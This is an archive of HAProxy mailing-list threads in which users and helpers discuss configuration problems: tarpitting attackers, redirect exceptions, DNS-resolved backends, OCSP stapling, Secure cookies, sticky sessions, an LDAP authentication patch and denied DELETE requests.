> Referrer Policy:no-referrer-when-downgrade
>
> Response Headers
>
> view source
>
> Cache-Control:nocache, no-store
>
> Content-Language:en
>
> Content-Length:800
>
> Content-Security-Policy:default-src 'self'; style-src 'self'
> 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval';
>
> Content-Type:text/html;charset=utf-8
>
> Date:Wed, 19 Jul 2017 06:45:33 GMT
>
> Pragma:no-cache
>
> Referrer-Policy:no-referrer-when-downgrade
>
> Strict-Transport-Security:max-age=31536000; includeSubDomains; preload
>
> X-Content-Type-Options:nosniff
>
> X-Frame-Options:SAMEORIGIN
>
> X-XSS-Protection:1; mode=block
>
> Request Headers
>
> view source
>
> Accept:application/xml, text/xml, */*; q=0.01
>
> Accept-Encoding:gzip, deflate, br
>
> Accept-Language:en-US,en;q=0.8
>
> Connection:keep-alive
>
> Content-Length:45
>
> Content-Type:application/x-www-form-urlencoded; charset=UTF-8
>
> Cookie:JSESSIONID=cc-tt-d~6EE3B690118810FEE7ED4B38E61D9294
>
> DNT:1
>
> Host:
>
> Origin:https://
>
> Referer:https:///Product.Name/signin;jsessionid=
> 6EE3B690118810FEE7ED4B38E61D9294
>
> User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
>
> Wicket-Ajax:true
>
> Wicket-Ajax-BaseURL:signin
>
> Wicket-FocusedElementId:btn1d9
>
> 

Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-28 Thread Igor Cicimov
On 28 Jul 2017 5:41 pm, "Charlie Elgholm"  wrote:

Hi Folks,

Either I'm too stupid, or it's because it's Friday

Can you tarpit/reject (or other action) based on a response from the
backend?
You should be able to, right?

Like this:
tcp-response content tarpit/reject if res.hdr(X-Tarpit-This)

Can someone explain this to me? (Free beer.)

I have a fairly complex ruleset on my backend server, written in Oracle
PL/SQL, which monitors Hack- or DoS-attempts, and I would love to tarpit
some requests on the frontend (by haproxy) based on something that happens
on my backend.

As I do now I return a 503 response from the server, and iptable-block
those addresses for a while. But since they see the 503 response they'll
return at a later date and try again. I would like the connection to just
die (drop, no response at all) or tarpit (long timeout, so they give up). I
suppose/hope they'll eventually remove my IP from their databases.

I'm guessing a tarpit is smarter than a reject, since a reject will
indicate to the attacker that something exists behind the server IP.
An iptables "drop" would be preferable, but I guess that's a little late
since haproxy has already acknowledged the connection to the attacker.

-- 
Regards
Charlie Elgholm
Brightly AB

Good example of delay with lua:
http://godevops.net/2015/06/24/adding-random-delay-specific-http-requests-haproxy-lua/


Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-28 Thread Igor Cicimov
On Fri, Jul 28, 2017 at 6:03 PM, Charlie Elgholm 
wrote:

> Thanks!
>
> I was really hoping for acl-validation on the basis of the response from
> the backend server, and not on the incoming request at the frontend.
> And, as much as I really like lua as a language, I'd rather keep my
> haproxy with as small footprint as possible. =)
>
> Really nice example about all the possibilities though, thanks!
>
> This is how all examples I find operate:
> incoming request => haproxy => frontend => acl based on what's known about
> the incoming requests => A or B
> A: backend => stream backend response to client
> B: tarpit / reject
>
> I would like this:
> incoming request => haproxy => frontend => backend => acl based on what's
> known about the response from the backend => A or B
> A: stream backend response to client
> B: tarpit / reject
>
>
> 2017-07-28 9:52 GMT+02:00 Igor Cicimov :
>
>>
>>
>> On 28 Jul 2017 5:41 pm, "Charlie Elgholm"  wrote:
>>
>> Hi Folks,
>>
>> Either I'm too stupid, or it's because it's Friday
>>
>> Can you tarpit/reject (or other action) based on a response from the
>> backend?
>> You should be able to, right?
>>
>> Like this:
>> tcp-response content tarpit/reject if res.hdr(X-Tarpit-This)
>>
>> Can someone explain this to me? (Free beer.)
>>
>> I have a fairly complex ruleset on my backend server, written in Oracle
>> PL/SQL, which monitors Hack- or DoS-attempts, and I would love to tarpit
>> some requests on the frontend (by haproxy) based on something that happens
>> on my backend.
>>
>> As I do now I return a 503 response from the server, and iptable-block
>> those addresses for a while. But since they see the 503 response they'll
>> return at a later date and try again. I would like the connection to just
>> die (drop, no response at all) or tarpit (long timeout, so they give up). I
>> suppose/hope they'll eventually remove my IP from their databases.
>>
>> I'm guessing a tarpit is smarter than a reject, since the reject will
>> indicate to the attacker that somethings exist behind the server IP.
>> An iptable "drop" would be preferable, but I guess that's a little late
>> since haproxy has already acknowledged the connection to the attacker.
>>
>> --
>> Regards
>> Charlie Elgholm
>> Brightly AB
>>
>> Good example of delay with lua: http://godevops.net/2015/
>> 06/24/adding-random-delay-specific-http-requests-haproxy-lua/
>>
>
>
>
> --
> Regards
> Charlie Elgholm
> Brightly AB
>

Well, the idea is to redirect the response on the backend (based on some
condition) to a local frontend where you can use the tarpit on the request.

You can also try:

http-response silent-drop if { status 503 }

which you can use in the backend (at least in 1.7.8, not sure about other
versions)


Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-29 Thread Igor Cicimov
On Fri, Jul 28, 2017 at 10:00 PM, Charlie Elgholm 
wrote:

> Ok, I'm on the 1.5.x branch unfortunately, due to Oracle Linux issues.
> I can install manually, but that might raise some eyebrows.
>
> But what you're telling me is that I can route the request to another
> backend (or drop it) in haproxy based on something I received from one
> backend??
I was thinking of something along these lines:

​frontend ft_tarpit
  mode http
  bind 127.0.0.1:
  default_backend bk_tarpit

backend bk_tarpit
  mode http
  timeout tarpit 3600s
  http-request tarpit

backend bk_main
  mode http
  http-response redirect 127.0.0.1: if { status 503 }​

but you are out of luck again since "http-response redirect" was introduced
in 1.6


Re: redirect scheme except some urls/params

2017-09-09 Thread Igor Cicimov
On 10 Sep 2017 12:05 am, "Markus Rietzler"  wrote:

hi,

i want to activate redirection from http to https for my sites. but my
problem is that there are certain requests which can't be redirected to
https.

so i have to write some acls to check this.

the urls which can't be redirected all contains client=, they can look
like:

- /path/what=all;client=bar
- /path/what=all;client=foo
- /path/what=all;client=bar;mode=something
- /path/?client=bar;what=today

those paths will be internal rewritten in apache.

so i need to check, that client= is not present in the request.

there are two further cases: client=; and client=sitemap. these can be
redirected to https. i tried a few ways but they didn't work. i either get
a 503 Server not available or all the client=xxx requests are redirected
to https.

i tried:

acl clientCheck urlp_reg /client=(?!(sitemap|;)).+/
redirect scheme https code 301 if !clientCheck

or

acl clientCheck path_reg /client=/
redirect scheme https code 301 if !clientCheck


Try escaping equal sign:

acl clientCheck path_reg /client\=/


any hints?

thanxs

markus
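As a side note, the negative-lookahead pattern from the first attempt can be sanity-checked outside HAProxy, since Python's re engine accepts the same lookahead syntax (whether it works inside HAProxy depends on it being built with PCRE, which is an assumption here):

```python
import re

# Match "client=" only when its value is neither "sitemap" nor empty
# (an immediate ";"), i.e. the requests that must NOT be redirected.
pattern = re.compile(r"client=(?!(sitemap|;)).+")

print(bool(pattern.search("/path/what=all;client=bar")))         # True
print(bool(pattern.search("/path/?client=sitemap;what=today")))  # False
print(bool(pattern.search("/path/what=all;client=;mode=x")))     # False
```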


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-15 Thread Igor Cicimov
On Fri, Sep 15, 2017 at 9:25 PM, Ludovic Gasc  wrote:

> Hi,
>
> I imagine that if I have no answer, it's because it isn't possible with
> HAProxy ?
>
> Thanks for your return.
>
>
> 2017-09-10 22:27 GMT+02:00 Ludovic Gasc :
>
>> Hi,
>>
>> I'm trying to reproduce this Nginx configuration with HAProxy:
>> https://memz.co/reverse-proxy-nginx-docker-microservices/
>>
>> Where it's possible to use DNS as dynamic list to proxy to the right
>> server.
>> Our use case isn't container-related, but simply to move a customer
>> easily from one backend server to another, without changing the HAProxy
>> configuration.
>>
>> The closest feature in HAProxy seems to be option http_proxy, however, no
>> DNS lookup is performed:
>> http://cbonte.github.io/haproxy-dconv/configuration-1.7.
>> html#4.2-option%20http_proxy
>>
>> I have tried to use a resolver in haproxy configuration + in backend
>> section:
>>   server XX %[hdr(host)]: resolvers dns check
>> inter 1000 init-addr last,libc,127.0.0.1
>>
>> However, it doesn't work.
>>
>> Maybe with a lua script it's possible to implement that, but I would
>> prefer to have a simple configuration like with Nginx.
>>
>> Did I miss something?
>>
>> BTW, thanks for HAProxy, I like a lot this product ;-)
>>
>> Regards.
>> --
>> Ludovic Gasc (GMLudo)
>>
>
>
This should be a feature in 1.8; which version did you try?


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-17 Thread Igor Cicimov
In 1.8 haproxy takes all records returned by the DNS resolver into account,
whereas in 1.7 it only uses the first one in the list. That's the difference
I was referring to in my previous comment. With this in mind, your setup
might not work as you expect when your service has more than one endpoint.

Regarding your specific example, what exactly is not working? Haproxy will
perform DNS resolution on startup, and my guess would be that it throws an
error since %[hdr(host)] at that point is empty.

On Sat, Sep 16, 2017 at 1:11 AM, Ludovic Gasc  wrote:

> I have tested with HAProxy 1.7.
>
> Where you see that it's a feature of 1.8 ?
> You mean I could try my piece of configuration on HAProxy 1.8, it should
> work ?
>
> Regards.
>
>


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-17 Thread Igor Cicimov
On Mon, Sep 18, 2017 at 7:11 AM, Ludovic Gasc  wrote:

> 2017-09-17 11:16 GMT+02:00 Igor Cicimov :
>
>> In 1.8 haproxy takes all records returned by the dns resolver into
>> account where is in 1.7 only the first one in the list. That's the
>> difference I was referring to in my previous comment. Having this in mind
>> your setup might not work as you expect in case when your service has more
>> than one endpoint.
>>
>
> Indeed, it doesn't help me.
>
>
>> Regarding your specific example, what exactly is not working? Haproxy
>> will perform dns resolution on startup and my guess would be it throws an
>> error since %[hdr(host)] at that point is empty.
>>
>
> Exactly.
> No idea to avoid that.
>

Try something like this, creating a separate backend per service:

frontend fe_web
  ...
  use_backend %[req.hdr(host),lower,map_dom(/etc/haproxy/domains.map,bk_unknown_domain)]

backend bk_svc_1
  server svc1 service1.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1

backend bk_svc_2
  server svc2 service2.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1
.
.
.
backend bk_svc_n
  server svcn servicen.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1

backend bk_unknown_domain
 


and have in your /etc/haproxy/domains.map map file:

service1.domain.com bk_svc_1
service2.domain.com bk_svc_2
...
servicen.domain.com bk_svc_n


It is not as dynamic as the Nginx example you linked to, since you have to
maintain the map file and add a new backend per service, but that's nothing
that can't be solved with some CM tool if needed. You could even avoid the
map file if you prefer, and name the backends after the Host header:

frontend
  use_backend %[req.hdr(host)]
  default_backend bk_unknown_domain

backend service1.domain.com
backend service2.domain.com
...
backend bk_unknown_domain


Igor
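Since the map file is just one "domain backend" pair per line, it is easy to generate from a service inventory instead of maintaining it by hand; a hypothetical sketch (the domain and backend names are illustrative):

```python
# Render an HAProxy map file from a dict of domain -> backend pairs.
services = {
    "service1.domain.com": "bk_svc_1",
    "service2.domain.com": "bk_svc_2",
    "servicen.domain.com": "bk_svc_n",
}

map_text = "".join(f"{domain} {backend}\n"
                   for domain, backend in sorted(services.items()))
print(map_text, end="")
```

The result could then be written to /etc/haproxy/domains.map (the path used above) and HAProxy reloaded.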


OCSP stapling with multiple certificates

2017-09-19 Thread Igor Cicimov
Hi,

I've been running haproxy with OCSP stapling for some time with a single
ssl certificate. Now I'm trying to enable the same for multiple
certificates but am getting an error:

OCSP single response: Certificate ID does not match any certificate or
issuer.

The OCSP response itself from the provider is good:

/etc/haproxy/ssl.d/${CERT}: good
This Update: Sep 19 23:48:22 2017 GMT
Next Update: Sep 26 23:03:22 2017 GMT

for all certificates but when I try feeding the OCSP response file to the
haproxy socket:

# echo "set ssl ocsp-response $(/usr/bin/base64 -w 1 ${CERT}.ocsp)" |
socat stdio unix-connect:/run/haproxy/admin.sock

I get the above error.

As mentioned at the beginning this is working fine with single cert. Am I
missing something or this is simply not possible?

​Thanks,
Igor​


Re: OCSP stapling with multiple certificates

2017-09-19 Thread Igor Cicimov
On Wed, Sep 20, 2017 at 4:00 PM, Jarno Huuskonen 
wrote:

> Hi,
>
> On Wed, Sep 20, Igor Cicimov wrote:
> > I've been running haproxy with OCSP stapling for some time with a single
> > ssl certificate. Now I'm trying to enable the same for multiple
> > certificates but am getting an error:
> >
> > OCSP single response: Certificate ID does not match any certificate or
> > issuer.
> >
> > The OCSP response itself from the provider is good:
> >
> > /etc/haproxy/ssl.d/${CERT}: good
> > This Update: Sep 19 23:48:22 2017 GMT
> > Next Update: Sep 26 23:03:22 2017 GMT
> >
> > for all certificates but when I try feeding the OCSP response file to the
> > haproxy socket:
> >
> > # echo "set ssl ocsp-response $(/usr/bin/base64 -w 1 ${CERT}.ocsp)" |
> > socat stdio unix-connect:/run/haproxy/admin.sock
> >
> > I get the above error.
> >
> > As mentioned at the beginning this is working fine with single cert. Am I
> > missing something or this is simply not possible?
>
> I've multiple certs w/ocsp stapling so it should work.
>
> Did you start haproxy with .ocsp files for all certs ?
>
> I think I might have seen the same error if I started haproxy w/out
> cert1.ocsp and then tried to update ocsp for cert1.
>
> -Jarno
>
> --
> Jarno Huuskonen
>

Yep, thanks Jarno. I went and found my notes on OCSP and realised that's
what I was missing.


Re: Set-Cookie Secure

2017-09-21 Thread Igor Cicimov
On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:

I set 2 cookies on behalf of Backend Servers: one with these configuration
lines at Frontend:



   rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
!back_cookie_present

   rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
!back_cookie_present

   rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
!back_cookie_present



one at Backend with these line (and Backend cookie directive on each
server):

   cookie cookie_ha_srvid insert indirect preserve nocache



now I need to change every response to clients to add "secure" attribute
for all client encrypted connections.

I applied following rules, but *no secure attribute is added to the
response*:



   acl https_sess ssl_fc

   acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure

   rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie





Roberto

Well if you are handling the requests in two different, lets call them
pipelines, like fe_http:80->be_http and fe_https:443-> be_https you can
obviously set secure cookies for the second one only without any acl
gymnastics.


Re: Set-Cookie Secure

2017-09-21 Thread Igor Cicimov
Then you can unconditionally include Secure in your "rspadd Set-Cookie ..."
since the communication between the client and HAP is always over SSL. Or
am I missing something?

On Fri, Sep 22, 2017 at 10:18 AM, mlist  wrote:

> Hi Igor, I use fe_https:443-> be_http


Re: TCP ACL rules based on host name

2017-10-04 Thread Igor Cicimov
On 22 Sep 2017 11:15 am, "rt3p95qs"  wrote:

Is it possible to assign TCP (non-HTTP) connections to a backend based on
an alias haproxy has?

For example:
HAProxy has 3 alias names, server01.example.com, server02.example.com and
server03.example.com.

The haproxy.conf file defines a front end and 3 back ends:

frontend static-svc
   bind *:80
   mode tcp
   option tcplog
   default_backend svc-svc-default


backend static-svc01
balance source
option tcplog
server server01 127.0.0.1 check

backend static-svc02
balance source
option tcplog
server server02 127.0.0.2 check

backend static-svc03
balance source
option tcplog
server server03 127.0.0.3 check

The idea being that each static service should only serve incoming
requests through a specific alias; therefore, requests coming from the
internet looking for server01.example.com would be sent to the
static-svc01 backend. I have seen tons of examples on how to do this with
HTTP, but I can't find any that focus on pure TCP. My application does not
use HTTP at all.

Thanks.


Hmmm, in the case of SSL you could do something like this using the SNI
extension:

tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend static-svc01 if { req.ssl_sni -i server01.example.com }

Otherwise I'm not sure how you can access the host header in a plain TCP
stream, since the Host header is an HTTP concept.


Re: Set-Cookie Secure

2017-10-05 Thread Igor Cicimov
Hi,

On Fri, Oct 6, 2017 at 2:50 AM, mlist  wrote:

> Hi Igor, some news about this ?
>
>
>
> *From:* mlist
> *Sent:* venerdì 22 settembre 2017 08:58
> *To:* 'Igor Cicimov' 
> *Cc:* 'HAProxy' 
> *Subject:* RE: Set-Cookie Secure
>
>
>
> I have acl to leave some sites http (not redirected to https), so adding
> the secure flag on rspadd is not an option.
Well no, not really. Above I asked if you are (or can convert to) running
two frontends, one for HTTP and one for HTTPS, and you replied that you
are not and that you are using a single *fe_https:443 -> be_http*. Are you
saying you have both HTTP and HTTPS over the same 443 port?

If not, and you are really running a single frontend listening on both 80
and 443 for http/https, i.e. a *fe_https:(80,443) -> be_http* setup, I
would say that your problem is here:

 acl https_sess ssl_fc

 acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure

 rspirep ^(set-cookie:.*) \1;\ Secure if *https_sess* !secured_cookie

More specifically, an ACL used in the response but set from a request-time
fetch like ssl_fc will not work. Try using *capture* or *set-var* instead,
so the value set at request time is preserved for the logic applied at
response time.

Also sending the full config with sensitive data removed can be helpful.


Re: Set-Cookie Secure

2017-10-08 Thread Igor Cicimov
Maybe try something like:

   http-request set-var(txn.req_ssl) ssl_fc

   acl https_sess var(txn.req_ssl)
   acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
   rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie

So the first line sets a transaction-scoped variable, valid for both the
request AND the response, which is then used in the https_sess acl for the
response.

On Sat, Oct 7, 2017 at 9:30 PM, mlist  wrote:

> I prefer to use only one frontend for all requests, so I can control much
> of the configuration centrally and avoid replicating rules that are not
> simple to maintain. Centralizing means managing the non-default cases: by
> default all http is converted to https unless certain conditions (acls)
> are met (for applications we impose https, for web sites we leave the
> choice, …).
>
>
>
> We also use stick tables as the basis for DDoS control, etc. (for now
> only basic rules), and use the cookie mechanism for normal persistence
> and for a special client-side app persistence needed to identify the
> backend server in special situations.
>
>
>
> Config file attached.
>
>
>
>
>
>
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 6 ottobre 2017 02:11
>
> *To:* mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
> Hi,
>
>
>
> On Fri, Oct 6, 2017 at 2:50 AM, mlist  wrote:
>
> Hi Igor, some news about this ?
>
>
>
> *From:* mlist
> *Sent:* venerdì 22 settembre 2017 08:58
> *To:* 'Igor Cicimov' 
> *Cc:* 'HAProxy' 
> *Subject:* RE: Set-Cookie Secure
>
>
>
> I have acl to leave some sites http (not redirected to https), so adding
> secure flag on rspadd it is not an option.
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com
> ]
> *Sent:* venerdì 22 settembre 2017 02:35
> *To:* mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
> Then you can unconditionally include Secure in your "rspadd Set-Cookie
> ..." since the communication between the client and HAP is always over SSL.
> Or am I missing something?
>
>
>
> On Fri, Sep 22, 2017 at 10:18 AM, mlist  wrote:
>
> Hi Igor, I use fe_https:443-> be_http
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 22 settembre 2017 00:44
> *To:* rob.mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
>
>
>
>
> On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:
>
> I set 2 cookies on behalf of Backend Servers: one with these configuration
> lines at Frontend:
>
>
>
>rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
> !back_cookie_present
>
>
>
> one at Backend with these line (and Backend cookie directive on each
> server):
>
>cookie cookie_ha_srvid insert indirect preserve nocache
>
>
>
> now I need to change every response to clients to add "secure" attribute
> for all client encrypted connections.
>
> I applied following rules, but *no secure attribute is added to the
> response*:
>
>
>
>
>
>
>
> acl https_sess ssl_fc
>
>acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie
>
>
>
>
>
> Roberto
>
> Well if you are handling the requests in two different, let's call them
> pipelines, like fe_http:80->be_http and fe_https:443->be_https, you can
> obviously set secure cookies for the second one only, without any acl
> gymnastics.
>
>
>
> Well no, not really. Above ^^^ I asked if you are (or can convert
> to) running two frontends, one for http and one for https, and you replied
> that you are not and that you are using a single *fe_https:443 -> be_http*.
> Are you saying you have both http and https over the same port 443?
>
>
> If not, and you are really running a single frontend listening on both 80
> and 443 for http/https, i.e. a *fe_https:(80,443) -> be_http* setup, I
> would say that your problem is here:
>
>
>
>
>
> *acl https_sess ssl_fc *
>
>  acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>  rspirep ^(set-cookie:.*) \1;\ Secure if *https_sess* !secured_cookie
>
>
>
> More specifically, an ACL in the response that depends on a request-time
> fetch will not work. Try using *capture* or *set-var* instead so the
> value set at request time is preserved for the logic applied at response
> time.
>
>
>
> Also sending the full config with sensitive data removed can be helpful.
>


Re: Haproxy config for sticky route

2017-10-10 Thread Igor Cicimov
On Tue, Oct 10, 2017 at 11:25 PM, Ruben  wrote:

> I have some stateful chat servers (SockJS) running in docker swarm mode.
> When doing dig chat I get an unordered randomized list of servers for
> example:
>
> (every time the order is different)
> 10.0.0.12
> 10.0.0.10
> 10.0.0.11
>
> The chat is accessed by a chatName url parameter. Now I want to be able to
> run a chat-load-balancer service in docker with multiple replicas using the
> haproxy image.
>
> The problem is that docker always resolves to a randomized list when doing
> dig chat.
>
> I want to map the chatName param from the url to a fixed server which
> always have the same ip from the list of ips of dig chat. So the mapping of
> the url_param should not be based on the position of the server in the
> list, but solely on the ip of the server.
>
> So for example ?chatName=fun should always route to ip 10.0.0.12, no
> matter what.
>
> My current haproxy.cfg is:
>
> defaults
>   mode http
>   timeout client 5s
>   timeout connect 5s
>   timeout server 5s
>
> frontend frontend_chat
>   bind :80
>   mode http
>   timeout client 120s
>   option forwardfor
>   option http-server-close
>   option http-pretend-keepalive
>   default_backend backend_chat
>
> backend backend_chat
>   balance url_param chatName
>   timeout server 120s
>   server chat chat:80
>
> At the moment it seems that only the Commercial Subscribtion of Nginx can
> handle this kind of cases using the sticky route $variable ...; directive
> in the upstream module.
>

Maybe try:

http-request set-header Host 10.0.0.12 if { query -m beg -i chatName=fun }
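
An alternative sketch that pins a chat to a fixed server with use-server
instead of rewriting the Host header; server names are made up, the IPs are
taken from the example above:

```
backend backend_chat
  timeout server 120s
  balance url_param chatName
  # route a given chatName to a fixed server, regardless of DNS ordering
  acl chat_fun url_param(chatName) -i fun
  use-server chat1 if chat_fun
  server chat1 10.0.0.12:80 check
  server chat2 10.0.0.10:80 check
  server chat3 10.0.0.11:80 check
```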


Re: Force Sticky session on HaProxy

2017-10-18 Thread Igor Cicimov
https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#option%20redispatch
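
The point of the link being that redispatching is what moves a stuck client
to another server; a minimal sketch of cookie persistence with redispatch
turned off (server names and IPs here are assumptions):

```
backend apaches
  balance roundrobin
  cookie SERVERID insert indirect nocache
  # keep clients pinned to their server even when it goes down
  no option redispatch
  server apache1 192.168.0.11:80 check cookie apache1
  server apache2 192.168.0.12:80 check cookie apache2
```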

On 18 Oct 2017 11:28 pm, "Devendra Joshi" 
wrote:

Hi Daniel ,

Following is the case.


[image: Inline images 1 — diagram of the HAProxy/Apache1/Apache2 setup]

My query is:
1: When users are being served webpages and my *Apache1* goes down, HAProxy
shifts the traffic to *Apache2*.
But I don't want to shift this traffic to *Apache2* when my *Apache1* is
down, because my application is session-based. I want those being served
by *Apache1* to stay on *Apache1*, not to be shifted to *Apache2*.
I want to apply forced sticky sessions in HAProxy.









Devendra Joshi
8080106035
--
--


On 18 October 2017 at 17:37, Daniel Schneller  wrote:

> Hi,
>
> maybe I am missing something, but isn’t this what
> http://cbonte.github.io/haproxy-dconv/1.6/configuration.html#4.2-cookie is
> supposed to do for you?
> We are using this (in prefix mode) to make sure the same JSESSIONID gets
> to the same backend every time.
> As the information is in the cookie, there is no state to be lost on the
> haproxy side.
>
> Daniel
>
> --
> Daniel Schneller
> Principal Cloud Engineer
>
> CenterDevice GmbH | Hochstraße 11 | 42697 Solingen | Deutschland
> tel: +49 1754155711
> daniel.schnel...@centerdevice.de | www.centerdevice.de
>
> Geschäftsführung: Dr. Patrick Peschlow, Dr. Lukas Pustina,
> Michael Rosbach, Handelsregister-Nr.: HRB 18655,
> HR-Gericht: Bonn, USt-IdNr.: DE-815299431
>
>
> On 18. Oct. 2017, at 11:58, Gibson, Brian (IMS) 
> wrote:
>
> I've used peers for this situation personally.
>
> Sent from Nine
> 
> From: Aaron West 
> Sent: Oct 18, 2017 5:33 AM
> To: Devendra Joshi
> Cc: HAProxy
> Subject: Re: Force Sticky session on HaProxy
>
> I've used something like this before:
>
> stick store-response res.cook(JSESSIONID)
> stick match req.cook(JSESSIONID)
>
> "stick on" does this I think:
>
> stick match req.cook(JSESSIONID)
> stick store-request req.cook(JSESSIONID)
>
> As the client doesn't have the cookie at the beginning of the
> connection it has to wait to store it until it's received from the
> server, I have a vague memory that I had issues with using simply
> "stick on" for this so switched to the first method above.
>
> There is a massive problem with my suggestion however, if you clear
> the stick table or restart the service(Which will clear the stick
> table) then users lose persistence until they close their browsers and
> start a new session or the server issues a new cookie. Obviously
> reloads while synchronising the stick table should be fine.
>
> However, I'm sure there will be a far better solution so I'm just
> starting the ball rolling really...
>
> Aaron West
>
> Loadbalancer.org Ltd.
>
> www.loadbalancer.org
>
> +1 888 867 9504 / +44 (0)330 380 1064
> aa...@loadbalancer.org
>
> LEAVE A REVIEW | DEPLOYMENT GUIDES | BLOG
>
>
> 
>
> Information in this e-mail may be confidential. It is intended only for
> the addressee(s) identified above. If you are not the addressee(s), or an
> employee or agent of the addressee(s), please note that any dissemination,
> distribution, or copying of this communication is strictly prohibited. If
> you have received this e-mail in error, please notify the sender of the
> error.
>
>
>


Re: [PATCH] LDAP authentication

2017-11-02 Thread Igor Cicimov
Hi ​Thierry,

On Fri, Nov 3, 2017 at 8:16 AM, Thierry Fournier  wrote:

>
> > On 2 Nov 2017, at 21:56, my.card@web.de wrote:
> >
> > Hi all,
> >
> > the attached patch implements authentication against an LDAP Directory
> Server. It has been tested on Ubuntu 16.04 (x86_64) using libldap-2.4-2 on
> the client side and 389-ds-base 1.3.4.9-1 on the server side. Add
> USE_LDAP=1 to your make command line to compile it in.
> >
> > What do I have to to, to get this functionality integrated within the
> next offcial haproxy release?
> >
> > I'm currently trying to figure out, how to pass commas ',' and bracket
> '(', ')' as arguments to http_auth_ldap. Do you have any hints for me on
> this topic?
> >
> > Feedback is very welcome!
>
>
> Hi, thanks for your patch.
>
> I already tried to add ldap authent in haproxy, but unfortunately the
> OpenLDAP library is only available in blocking mode. Unfortunately (again)
> OpenLDAP seems to be the only one lib LDAP available. So during the
> processing of the sample fetch “http_auth_ldap”, the following functions
> perform some network request and block HAProxy.
>
>  * ldap_initialize (maybe)
>  * ldap_simple_bind_s
>  * ldap_search_ext_s
>
> HAProxy is blocked waiting for LDAP response, so during this time HAProxy
> no longer process more HTTP requests. This behavior is not acceptable under
> heavy load.
>

How about cases that have light load :-). I've been asking/waiting for
this feature for a long time and think it is (going to be) a very
valuable addition to haproxy. Anyway, if you had experienced some issues
with the lib, I wonder how Apache and Nginx are doing it without
any performance impact? (or so we think?)

Maybe I would argue that as a feature it should be included in haproxy
anyway and be left to the users to opt for using it or not, with heavy
warning about possible performance impact.


> Two way for performing LDAP authent:
>
>  * easy: look at the SPOE protocol. You just write a multithreaded server
> which listens to HAProxy over SPOE, performs the LDAP request and returns
> the response. You will find an example of a SPOE server in the contrib
> directory. I guess that a SPOE contrib for LDAP authent would be welcome.
>
>  * difficult: craft your own LDAP payload (very hard with v3 and crypto)
> and write code using a socket, like SPOE or a Lua cosocket
>
> Best regards,
> Thierry
>
>
> >
> > Kind regards,
> >
> >   Danny
> > <0001-Simple-LDAP-authentication.patch>
>
>
Cheers,
Igor


Re: HTTP DELETE command failing

2017-11-02 Thread Igor Cicimov
On Fri, Nov 3, 2017 at 11:29 AM, Norman Branitsky <
norman.branit...@micropact.com> wrote:

> I have this included in the configuration:
>
> # Filter nasty input
>
> acl missing_cl hdr_cnt(Content-length) eq 0
>
> acl METH_PUT method PUT
>
> acl METH_GET method GET HEAD
>
> acl METH_PATCH method PATCH
>
> ##acl METH_DELETE method DELETE
>
> http-request deny if HTTP_URL_STAR !METH_OPTIONS || METH_POST missing_cl
> || METH_PUT missing_cl || METH_PATCH missing_cl || METH_DELETE missing_cl
>
> http-request deny if METH_GET HTTP_CONTENT
>
> http-request deny unless METH_GET or METH_POST or METH_OPTIONS or
> METH_PATCH or METH_DELETE or METH_PUT
>
>
>
> My colleague commented out the METH_DELETE acl.
> It appears that in HAProxy 1.7 a number of acls are predefined
>
> and we could delete the METH_PUT, METH_GET, and METH_PATCH acls also.
> So is one of the http-request deny statements causing the problem?
>
>
Maybe check the DELETE RFC:
https://tools.ietf.org/html/rfc7231#section-4.3.5

and think about what to do with your conditions. Start by removing
"|| METH_DELETE missing_cl" from the first one.

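Since DELETE requests normally carry no body, and therefore no
Content-Length header, the `METH_DELETE missing_cl` clause in the quoted
config denies every DELETE. A sketch of the relaxed rules, keeping the acl
names from the quoted configuration:

```
  acl missing_cl hdr_cnt(Content-length) eq 0
  acl METH_PUT   method PUT
  acl METH_PATCH method PATCH

  # only body-carrying methods must announce a Content-Length
  http-request deny if HTTP_URL_STAR !METH_OPTIONS
  http-request deny if METH_POST missing_cl || METH_PUT missing_cl || METH_PATCH missing_cl
  http-request deny if METH_GET HTTP_CONTENT
  http-request deny unless METH_GET or METH_POST or METH_OPTIONS or METH_PATCH or METH_DELETE or METH_PUT
```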

Re: backend has no server available!

2017-11-13 Thread Igor Cicimov
